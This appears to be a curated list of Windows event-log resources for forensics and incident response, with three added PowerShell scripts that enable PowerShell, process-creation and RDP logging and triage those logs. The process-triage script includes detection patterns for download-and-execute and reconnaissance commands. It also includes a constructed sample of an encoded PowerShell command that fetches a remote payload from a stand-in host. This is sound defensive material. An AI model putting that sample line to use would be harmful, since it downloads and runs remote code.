awesome-event-ids
Event IDs
A collection of Event ID resources useful for Digital Forensics and Incident Response
588 stars
24 watching
85 forks
last commit: 5 months ago
Awesome Event IDs / Resources / Event ID databases | |||
EventTracker Knowledgebase | Database | ||
MyEventlog.com | Database | ||
Awesome Event IDs / Resources / Event ID documentation | |||
Kaspersky Security for Microsoft Exchange | Official resource | ||
Microsoft Defender Antivirus | Official resource | ||
Microsoft Windows Security Auditing | Official resource | ||
Microsoft Windows Security Auditing by Randy Franklin Smith | Better known as | ||
Notable Event IDs | 586 | 30 days ago | Collection of common event IDs with descriptions |
Sysmon | Official resource | ||
Symantec Endpoint Protection 14.0.X | Official resource | ||
Symantec Endpoint Protection Manager | Official resource | ||
Events and Errors - Windows Server 2008 | Collection of event IDs from different Windows event sources. Applies to Windows Server 2008 and similar. (Official resource) | ||
Finding Forensic Goodness In Obscure Windows Event Logs | List of lesser-known Event IDs | ||
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / General | |||
Audit Policy Recommendations | Audit Policy Recommendations by Microsoft | ||
SIEM Tactics, Techniques, and Procedures | 586 | 30 days ago | Comprehensive SIEM resources by TonyPhipps |
Windows Auditing Mindmap | 1,044 | 3 months ago | Set of mindmaps giving a detailed overview of the different Windows auditing capabilities and event log files |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / PowerShell | |||
Script Block Logging | Enable 4104 (script block text as it was actually executed) | ||
Module Logging | Enable 4103 (pipeline execution details with parameter values) | ||
Malware Archeology PowerShell Logging Cheat Sheet | |||
Greater Visibility Through PowerShell Logging | |||
PowerShell Logging for the Blue Team | |||
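The entries above say which PowerShell logging features to switch on. The following is an added example, not code from this list or from any of the guides it links: it sets Script Block Logging and Module Logging through the same policy registry keys that Group Policy writes, then reads the resulting 4104 and 4103 events back from Microsoft-Windows-PowerShell/Operational, re-joining script blocks that the engine split across several 4104 records. It assumes an elevated Windows PowerShell 5.1 prompt; the `-SuspiciousOnly` switch relies on the engine's built-in practice of logging blocks it considers suspicious at Warning level (Level 3), which happens even when the policy is off.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the awesome-event-ids list or the guides it links.
# Enables Script Block Logging (4104) and Module Logging (4103) through the policy
# registry keys, then queries Microsoft-Windows-PowerShell/Operational.

$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 4104: the script block as the engine compiled it, i.e. after any obfuscation was undone.
Set-PolicyValue "$policy\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
# 4105/4106 start/stop records are very noisy; keep them off unless a case needs them.
Set-PolicyValue "$policy\ScriptBlockLogging" 'EnableScriptBlockInvocationLogging' 0
# 4103: pipeline execution details with bound parameter values, for every module ('*').
Set-PolicyValue "$policy\ModuleLogging" 'EnableModuleLogging' 1
Set-PolicyValue "$policy\ModuleLogging\ModuleNames" '*' '*' 'String'

$log = 'Microsoft-Windows-PowerShell/Operational'

function Get-ScriptBlockText {
    # 4104 Properties layout: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText,
    # [3] ScriptBlockId, [4] Path. Large scripts arrive as several records sharing one
    # ScriptBlockId; this groups them and joins the chunks back in order.
    param([int]$MaxEvents = 500, [switch]$SuspiciousOnly)
    $filter = @{ LogName = $log; Id = 4104 }
    if ($SuspiciousOnly) { $filter['Level'] = 3 }   # Warning: the engine flagged the block itself
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      Group-Object { $_.Properties[3].Value } |
      ForEach-Object {
          $parts = @($_.Group | Sort-Object { [int]$_.Properties[0].Value })
          [pscustomobject]@{
              Time          = $parts[0].TimeCreated
              ScriptBlockId = $_.Name
              Path          = $parts[0].Properties[4].Value
              Complete      = ($parts.Count -eq [int]$parts[0].Properties[1].Value)
              Text          = -join ($parts | ForEach-Object { $_.Properties[2].Value })
          }
      }
}

function Get-ModuleLogEvents {
    # 4103 Properties layout: [0] ContextInfo, [1] UserData, [2] Payload (command + parameters).
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 4103 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
          [pscustomobject]@{ Time = $_.TimeCreated; User = $_.UserId; Payload = $_.Properties[2].Value }
      }
}

# The policy is read when an engine starts, so generate activity in a fresh process and read it back.
& powershell.exe -NoProfile -Command 'Get-ChildItem Env: | Out-Null'
Get-ScriptBlockText -MaxEvents 50 | Format-Table Time, Path, Complete, Text -Wrap
Get-ScriptBlockText -SuspiciousOnly | Format-Table Time, Text -Wrap
Get-ModuleLogEvents -MaxEvents 20 | Format-Table -Wrap
```

The `Complete` column is worth checking before acting on a 4104 record: when an attacker's script is long, only some of its chunks may still be in the log after rotation, and a partial block can hide the part that matters.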
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Security Auditing | |||
Command line Process Auditing | Enable 4688 with the process command line included | ||
Critical Windows Event IDs to Monitor | Monitoring suggestions | ||
Events to Monitor | Official resource | ||
Monitoring Guidance | 274 | about 3 years ago | Event monitoring guidance from the Dutch JSCU (Joint SIGINT Cyber Unit), with volume estimates and WEC/WEF configurations |
Malware Archeology Windows Logging Cheat Sheet | |||
Malware Archeology Advanced Windows Logging Cheat Sheet | |||
Malware Archeology Splunk Logging Cheat Sheet | Covers the specific exclusions needed to avoid noise from the Splunk Universal Forwarder agent | ||
Malware Archeology File Auditing Cheat Sheet | |||
Malware Archeology Registry Auditing Cheat Sheet | |||
Malware Archeology ATT&CK Logging Cheat Sheet | From 2018 | ||
US NSA Spotting the Adversary with Windows Event Log Monitoring | Covers quite a lot of ground | ||
US NSA Event Forwarding Guidance | 852 | about 4 years ago | Companion repository with WEF configurations, scripts to configure WEF, and WEF subscriptions in XML format |
UK NCSC - Logging Made Easy WEC (Windows Event Collection) Configuration File | 706 | about 1 year ago | |
Windows Security Monitoring - Policy & Event IDs | Spreadsheet with recommendations sorted by system functions | ||
EventID Policy Map | Spreadsheet with policy map as well as reference collection | ||
Windows security event log library | Small database with explanations and monitoring suggestions | ||
Yamato Security's Ultimate Windows Event Log Configuration Guide For DFIR And Threat Hunting | 556 | about 1 year ago | |
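Several entries in this section come back to the same point: 4688 is only useful once the command line is recorded with it. The following is an added example, not code from this list or from Microsoft's guidance: it enables the Process Creation subcategory and the command-line inclusion policy, then triages 4688 records, decoding `-EncodedCommand` payloads so the checks run on what actually executed. It assumes an elevated Windows PowerShell prompt; the sample record at the bottom is constructed, not real telemetry, so the triage path can be exercised on a host with no interesting events yet.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the awesome-event-ids list or from the guidance it links.
# Turns on 4688 with the process command line included, then triages 4688 records.

# 1. Audit policy: the "Process Creation" subcategory produces 4688 in the Security log.
auditpol.exe /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null

# 2. Without this value 4688 carries the image path only and the CommandLine field is empty.
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $auditKey)) { New-Item -Path $auditKey -Force | Out-Null }
New-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' `
    -Value 1 -PropertyType DWord -Force | Out-Null

function ConvertFrom-EventData {
    # Reads the <Data Name="..."> fields from the event XML instead of relying on the
    # positional Properties[] layout, which differs between Windows builds.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $fields = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    $fields
}

function Get-EncodedCommandText {
    # -EncodedCommand (and its prefixes -e, -ec, -en, -enc ...) takes Base64 of UTF-16LE text.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)\s-e(?:c|n|nc\w*)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    $null
}

function Test-SuspiciousProcess {
    # Returns the reasons a 4688 record deserves a look; an empty list means nothing matched.
    param([hashtable]$Fields)
    $reasons = [System.Collections.Generic.List[string]]::new()
    $cmd    = [string]$Fields['CommandLine']
    $parent = [string]$Fields['ParentProcessName']
    $child  = [string]$Fields['NewProcessName']

    if ($parent -match '(?i)\\(winword|excel|powerpnt|outlook)\.exe$' -and
        $child  -match '(?i)\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)\.exe$') {
        $reasons.Add("Office application spawned $([IO.Path]::GetFileName($child))")
    }
    $decoded = Get-EncodedCommandText $cmd
    if ($decoded) { $reasons.Add("EncodedCommand decodes to: $decoded") }
    $text = if ($decoded) { $decoded } else { $cmd }     # inspect the decoded form when present
    if ($text -match '(?i)\b(DownloadString|DownloadFile|IEX|Invoke-Expression|FromBase64String)\b') {
        $reasons.Add('Download/decode-and-execute primitive in command line')
    }
    if ($text -match '(?i)\b(whoami|nltest|net\s+(user|group|localgroup))\b') {
        $reasons.Add('Host or domain reconnaissance command')
    }
    ,$reasons
}

# Constructed sample (not real telemetry) so the triage path can be exercised offline.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage1")'
$sample = @{
    NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
    CommandLine       = 'powershell.exe -nop -w hidden -enc ' +
                        [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
}
Test-SuspiciousProcess $sample   # three reasons: Office parent, decoded payload, IEX/DownloadString

# Same logic over the live Security log.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 500 -ErrorAction SilentlyContinue |
  ForEach-Object {
      $f = ConvertFrom-EventData $_
      $hits = Test-SuspiciousProcess $f
      if ($hits.Count -gt 0) {
          [pscustomobject]@{ Time = $_.TimeCreated; Process = $f['NewProcessName']
                             Parent = $f['ParentProcessName']; Reasons = ($hits -join '; ') }
      }
  } | Format-Table -Wrap
```

The sample record is the case the decoder exists for: the raw command line contains no `IEX` or `DownloadString` string at all, so a rule that only greps the literal command line misses it, while the decoded text trips two checks.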
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Sysmon | |||
Configuration by SwiftOnSecurity | 4,803 | 5 months ago | Configuration file template with default high-quality event tracing |
Fork of SwiftOnSecurity's configuration by Neo23x0 (Florian Roth) | 454 | 10 months ago | Same as above, with all PRs merged |
Configuration by olafhartong | 2,661 | 3 months ago | A repository of Sysmon configuration modules |
Malware Archeology Sysmon Logging Cheat Sheet | |||
Sysmon Community Guide | 1,147 | 6 months ago | |
Awesome Event IDs / Resources / Event ID analysis / General | |||
EVTX Attack Samples | 2,248 | almost 2 years ago | EVTX samples recorded during attack simulations by sbousseaden |
EVTX-to-MITRE-Attack | 527 | 3 months ago | More than 170 EVTX samples matched to MITRE TTPs provided by |
Tool Analysis Result Sheet | Logs analyzed after tool execution by JPCERT | ||
EvtxECmd Map Repository | 282 | 3 months ago | Maps used by Eric Zimmerman's EvtxECmd; each map documents one Event ID, its lookup tables, and the important fields EvtxECmd extracts from it |
Event Log Observer | View, analyze and monitor events recorded in Microsoft Windows event logs | ||
Splunk advanced input configuration for Windows | 81 | about 2 months ago | Provides an advanced inputs.conf for Windows and third-party software, with more than 70 different event logs mapped to MITRE ATT&CK |
Windows Security Event ID Helper | 8 | over 1 year ago | Lets you filter on each GPO audit setting and displays all Event IDs it produces |
Awesome Event IDs / Resources / Event ID analysis / Antivirus | |||
Antivirus Event Analysis Cheat Sheet | Antivirus Event Analysis Cheat Sheet | ||
Awesome Event IDs / Resources / Event ID analysis / PowerShell | |||
Attack and Defense Around PowerShell Event Logging | PowerShell logging deep dive from different perspectives by Mina Hao | ||
Awesome Event IDs / Resources / Event ID analysis / RDP | |||
RDP Logon / Logoff events 1 | RDP event chain by Jonathon Poling | ||
RDP Logon / Logoff events 2 | RDP deep dive on Event ID 1149 by Mike Cary | ||
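The two write-ups above walk through the RDP event chain. The following is an added example, not code from this list or from either write-up: it pulls the pieces of that chain from the three logs they live in (1149 from RemoteConnectionManager, 4624 logon types 10 and 7 from Security, 21 to 25 from LocalSessionManager) and sorts them into one timeline per host. It assumes an elevated prompt on the RDP target itself; the seven-day window is an arbitrary default.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the awesome-event-ids list or the linked write-ups.
# Stitches the RDP logon chain into one timeline:
#   1149 (RemoteConnectionManager) -> 4624 type 10 (Security) -> 21 / 22 (LocalSessionManager)
#   ... 24 disconnect, 25 reconnect (paired with a 4624 type 7), 23 logoff.

function Get-RdpTimeline {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    $rcm = 'Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational'
    $lsm = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
    $events = [System.Collections.Generic.List[object]]::new()

    # 1149: the client reached the listener. With NLA on, the credentials were already accepted;
    # without NLA it only proves a connection attempt.
    Get-WinEvent -FilterHashtable @{ LogName = $rcm; Id = 1149; StartTime = $Since } -ErrorAction SilentlyContinue |
      ForEach-Object {
          $x = ([xml]$_.ToXml()).Event.UserData.EventXML   # Param1 user, Param2 domain, Param3 address
          $events.Add([pscustomobject]@{ Time = $_.TimeCreated; Id = 1149; Stage = 'Network connection'
                                         User = "$($x.Param2)\$($x.Param1)"; Source = $x.Param3; Session = $null })
      }

    # 21 logon, 22 shell start, 23 logoff, 24 disconnect, 25 reconnect (UserData: User, SessionID, Address)
    $stage = @{ 21 = 'Session logon'; 22 = 'Shell start'; 23 = 'Session logoff'
                24 = 'Session disconnect'; 25 = 'Session reconnect' }
    Get-WinEvent -FilterHashtable @{ LogName = $lsm; Id = 21, 22, 23, 24, 25; StartTime = $Since } -ErrorAction SilentlyContinue |
      ForEach-Object {
          $x = ([xml]$_.ToXml()).Event.UserData.EventXML
          $events.Add([pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; Stage = $stage[[int]$_.Id]
                                         User = $x.User; Source = $x.Address; Session = $x.SessionID })
      }

    # 4624: type 10 = RemoteInteractive. Type 7 (unlock) is what an RDP reconnect produces, but it also
    # fires for local console unlocks, so read it together with a 25 rather than on its own.
    $xpath = "*[System[EventID=4624] and EventData[Data[@Name='LogonType']='10' or Data[@Name='LogonType']='7']]"
    Get-WinEvent -LogName 'Security' -FilterXPath $xpath -MaxEvents 5000 -ErrorAction SilentlyContinue |
      Where-Object { $_.TimeCreated -ge $Since } |
      ForEach-Object {
          $d = @{}
          foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
          $events.Add([pscustomobject]@{ Time = $_.TimeCreated; Id = 4624; Stage = "Logon type $($d['LogonType'])"
                                         User = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
                                         Source = $d['IpAddress']; Session = $null })
      }

    $events | Sort-Object Time
}

Get-RdpTimeline | Format-Table Time, Id, Stage, User, Source, Session -AutoSize
```

A complete interactive session reads 1149, 4624 type 10, 21, 22 within a second or two of each other, then 24 or 23 at the end; a 1149 with nothing after it is a failed or abandoned connection, and a 25 with no preceding 24 on this host means the disconnect happened before the time window started.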
Awesome Event IDs / Resources / Event ID analysis / SMB | |||
SMB error events (local collection) | |||
Awesome Event IDs / Resources / Event ID analysis / Task Scheduler | |||
Task Scheduler Event IDs | List of the most common Event IDs for Windows Scheduled Tasks by mnaoumov | ||
Awesome Event IDs / Resources / Event ID analysis / Windows Remote Command Execution | |||
Traces of Windows remote command execution | Blog post on the remote command execution techniques used by attackers and red teamers, with detailed logging recommendations | ||
Awesome Event IDs / Resources / Event ID analysis / Windows Specific Event IDs | |||
Windows Event ID 4776 [SOLVED] | Blog post explaining the meaning of 4776 by Diego Asturias | ||
Awesome Event IDs / Contributing | |||
awesome-incident-response | 7,682 | 4 months ago | |
awesome-forensics | 4,000 | 11 days ago | |
awesome-forensicstools | 487 | about 4 years ago | |
awesome-security | 12,479 | 4 months ago |